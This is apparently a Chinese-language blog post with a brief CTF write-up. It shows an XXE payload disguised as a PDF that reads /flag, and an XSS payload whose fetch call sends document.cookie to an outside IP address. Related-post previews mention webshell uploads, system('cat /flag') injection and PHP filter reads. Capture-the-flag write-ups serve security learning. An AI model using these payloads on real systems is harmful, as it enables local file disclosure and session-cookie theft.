加载中...

UnionCTF-WP

发表于2026-01-25|更新于2026-01-25|赛题wp

|总字数:144|阅读时长:1分钟|浏览量:

SecureDoc

发现是一个pdf上传器，能够识别提取XFA表单，搜索发现XFA使用XML结构，所以加上pdf文件头后直接伪造就行

%PDF-1.7
%

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xdp [
  <!ENTITY flag SYSTEM "file:///flag">
]>
<xdp:xdp>
  <xfa:datasets>
    <xfa:data>
      <data>&flag;</data>
    </xfa:data>
  </xfa:datasets>
</xdp:xdp>

然后访问上传的XFA就行

UniCTF{61473d29-63a3-4147-ae5b-7326b4fad876}

GlyphWeaver

{%print()%}



<body/onload=fetch(`http://38.55.99.186:1225/xss/xss.php?cookie=${document.cookie}`)>

文章作者: yxing

文章链接: http://yxing-1.github.io/2026/01/25/UnionCTF-WP/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Yxing！

相关推荐

2024HTTP 是什么呀常规的GET，POST传参，改cookie,referer,UA,IP，注意这里如果是GET传参要传入%00，就要先url编码一次，即传入%2500，因为浏览器会自动进行一次url解码 GET /?basectf=we1c%2500me POST Base=fl@gCookie: c00k13=i can't eat itUser-Agent: BaseReferer: BaseX-Forwarded-For:127.0.0.1 base64解码即可喵喵喵´•ﻌ•`直接GET传参 DT=system('ls /');DT=system('cat /flag'); md5绕过欸直接数组绕过即可，注意第二层为强比较，也可用数组绕过 GET:name[]=1&name2[]=2Post:password[]=3&password2[]=4 A Dark Room源码 upload写个一句话木马存为1.php上传，bp抓包修改文件类型为Content-Type:...

2025WEBnot so web 1题目先随便注册登录进入后base64解码得到源码 import base64, json, timeimport os, sys, binasciifrom dataclasses import dataclass, asdictfrom typing import Dict, Tuplefrom secret import KEY, ADMIN_PASSWORDfrom Crypto.Cipher import AESfrom Crypto.Util.Padding import pad, unpadfrom flask import ( Flask, render_template, render_template_string, request, redirect, url_for, flash, session,)app = Flask(__name__)app.secret_key = KEY@dataclass(kw_only=True)class APPUser: ...

WEBpop<?phpclass A1{ public $a1;}class A2{ public $a2 = '10086';}class A3{ public $a3;}class A4{ public $a4;}$a=new A1();$a->a1=new A2();$a->a1->a2=new A3();$a->a1->a2->a3=new A4();echo...

WEBWelcome ！！ ctbuctf{we1c0me_t0_CT9UC7F2025} Sql_No_map…?原先还在自己测，结果发现目录有东西…… //index.php<?phprequire 'lib.php';header("Content-Type: text/html; charset=utf-8");$err = '';$selected_id = $_GET['id'] ?? '';$selected_article = null;// 获取文章列表$list_sql = "SELECT id, title FROM article ORDER BY id ASC"; //升序排列$list_res = db()->query($list_sql);$articles = [];while ($row = $list_res->fetch_assoc()) { $articles[]...

2025WEBDeceptiFlag看到隐藏元素，而且提示拼音，分别输xiyangyang，huitailang进入tips.php cookie中发现flag位置为/var/flag/flag.txt，随便尝试几个路径包含发现都不行，伪协议读取成功 //file=php://filter/read=convert.base64-encode/resource=tips.php//tips.php<?phpsession_start();// 为 PHP 7 添加 str_starts_with 函数兼容支持if (!function_exists('str_starts_with')) { function str_starts_with($haystack, $needle) { return strpos($haystack, $needle) === 0; }}if (!isset($_SESSION['verified']) ||...

数据加载中